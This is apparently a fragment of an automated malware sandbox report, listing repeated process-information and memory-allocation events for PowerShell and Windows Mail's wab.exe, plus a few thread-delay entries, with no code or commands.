              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23A40000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23860000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
